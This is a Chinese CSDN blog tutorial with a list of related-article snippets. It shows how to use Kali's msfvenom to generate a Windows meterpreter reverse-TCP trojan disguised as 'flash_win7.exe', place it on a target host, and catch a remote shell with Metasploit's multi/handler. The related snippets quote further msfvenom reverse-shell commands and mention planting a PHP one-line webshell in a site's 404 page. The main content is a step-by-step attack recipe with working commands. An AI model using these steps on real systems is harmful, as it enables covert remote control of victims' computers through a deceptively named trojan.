用kali生成木马文件,获取目标主机shell

最新推荐文章于 2025-06-25 11:32:03 发布
最新推荐文章于 2025-06-25 11:32:03 发布
阅读量6.3k 收藏 30
点赞数 5
CC 4.0 BY-SA版权
分类专栏: kali 文章标签: 获取shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43801543/article/details/85090719
本文介绍如何使用MSFVenom生成恶意载荷,配合Metasploit进行渗透测试。从启动PostgreSQL服务开始,详细展示了载荷的生成过程,包括选择载荷、指定目标地址和端口,以及在目标主机上执行攻击。通过监听等待目标运行,最终实现后台shell的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、service postgresql start 在主机中启动服务
2、msfvenom -l payload 查看支持的载荷
-p 选择一个载荷,或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
部分支持载荷如下
在这里插入图片描述3、msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.101.112.194 LPORT=443 -f exe X > flash_win7.exe 在home目录中生成一个flash_win7.exe文件,放入到目的主机中(需要注意)
4、msfconsole 进入msf模式
5、use exploit/multi/handler 使用渗透攻击
6、设置本地地址以及本地端口并开始攻击(exploit
7、监听,一旦目的主机运行运用,则被渗透
在这里插入图片描述
8、可直接输入shell 成功进入后台。
在这里插入图片描述第一次写博客,还是有很多不足啊。

网络安全——使用反弹木马进行提权获取主机Shell
Jay
07-20 1647
在页面的右边找到404.php的模板代码修改页面,直接将一句话木马的内容写入404页面中,如
kali 生成PHP木马病毒进行靶机控制
chidaoqiannianzq的博客
10-17 1612
Msfvenom 是 Metasploit Framework 的一个非常强大的工具,它结合了之前 msfpayload 和 msfencode 的功能,用于生成各种类型的 Payloads,包括但不限于 shellcode、恶意文件、恶意链接等。Msfvenom 可以帮助渗透测试人员创建自定义的 Payloads,以用于渗透测试、漏洞利用和红队行动中。
2021-12-09 使用kali生成木马,渗透Windows系统
夕阳的街道的博客
12-09 1万+
一、实验题目:使用kali生成木马,渗透Windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制Windows系统 三、实验环境: 1. 攻击者IP(kali):192.168.112.130 2. 靶机IP(Windows10):192.168.112.136 三、实验步骤: 1. 保证两个系统能相互ping通 2. 生成木马,在kali打开终端,输入以下命令: msfvenom -p windows/meterpre...
kali 主动信息收集之主机发现
qq_45070118的博客
06-23 1909
主动信息收集,简单地说,就是直接和目标主机进行通信,进而来查看相应的信息。其缺点是很明显的,就是它容易被发现,主动发起的直接请求会被目标主机记录下来,即会留下访问的痕迹,最好使用受控的第三方主机进行探测,如使用代理或者是已经被控制的主机。 分为二层发现三层发现四层发现 二层发现 arping arping命令是用于发送arp请求到一个相邻主机的工具,arping使用arp数据包,通过ping命令检...
2025版最新Kali Linux安装教程(非常详细),零基础入门到精通,看这一篇就够了_kali安装
最新发布
小司机的奥拓
06-25 3995
物理机安装是指开机可以直接启动kali系统网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。黑客/网络安全学习路线。
如何在kali linux中部署文件上传靶场,并在Windows本机访问
分享与记录
05-12 1467
我没有用之前那个比较经典的文件上传靶场,而是使用国光大佬自己开发的靶场,讲解更详细,界面更好看。 项目地址: https://hub.docker.com/r/sqlsec/ggctf-upload 进入目录,然后安装,这我自行把文件夹名称改为upload-labs # 进入项目文件夹 cd upload-labs # 一键部署运行 docker-compose up -d 该项目的13个题目,端口为30001-30013。 因此,从 Windows 本机访问 kali linux 的 IP,
使用Kali Linux系统生成木马病毒并实现远程控制计算机
热门推荐
guyu的博客
05-06 4万+
使用KALI生成木马病毒实现远程控制 前言    该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。        我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:    1、VMware Workstation Pro 16(虚拟机)    下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.
kali生成shell监听目标主机
weixin_33805557的博客
10-21 661
生成监听用的shell.exe: reverse_tcp(反向连接) path : payload/windows/meterpreter/reverse_tcp msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=8080 X > ~/Desktop/shell.exe reverse_...
msf之msfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 4592
msfvenom的使用
利用msfvenom生成木马文件反弹shell
dreamthe的博客
11-19 4873
1.安装靶机和攻击机 首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win 7 这记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。 kali的下载地址Get Kali | Kali Linux: 在虚拟机面直接选择打开就可以了。 攻击机 kali ip是192.168.3.138 靶机 win server 2008 R2 ip是192.168.3.147 ...
kali生成木马
03-22
### Kali Linux生成木马程序的方法 在渗透测试环境中,`msfvenom` 是一种强大的工具,可以用来生成各种类型的 Payload(有效载荷)。以下是关于如何利用 `msfvenom` 工具生成 PHP 木马文件的具体方法。 #### ...
网安小白学kali——植入木马控制靶机摄像头
weixin_58457050的博客
04-30 5799
植入木马监控(钓鱼式)
利用kali下的msf入侵靶机
ro4lsc的博客
01-16 1万+
前段时间学了msf的一些基础知识,正好有时间了,在本地搭建好了环境,准备练练手。(Tips:请勿用作非法用途,仅供学术交流)
Kali linux windows木马(外网) 保姆级教学
m0_73135216的博客
01-01 3979
kali linux 木马实现外网控制(保姆级教学)
kali使用msf简单制作木马
m0_53820621的博客
11-15 1万+
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe 命令分解: msfvenom #使用msf中msfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定p
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 1万+
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
Kali系统渗透靶机(物理机)的详细过程
哆啦A梦
03-21 7193
Kali系统渗透靶机
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 5936
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
Kalikali主要工具使用说明(文末附超全思维导图)
PP_zi的博客
05-11 4万+
本文为《从实践中学习Kali Linux渗透测试》总结笔记,仅供学习使用,禁止用于非法用途,转载请附上原文链接! 1. 信息收集 1.1 发现主机 traceroute 获取目标主机的路由条目,确定网络拓扑。每一跳表示一个网关,星号可能为防火墙导致。 1.1.1 扫描主机 ① nmap nmap -sP ip/ip段 对目标主机实施ping扫描,探测主机是否在线 也可以通过其他语法,扫描主机开放端口、使用的操作系统等 ② Netdiscover ARP侦查工具,可以扫描IP地址,检查在线主机。 .
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值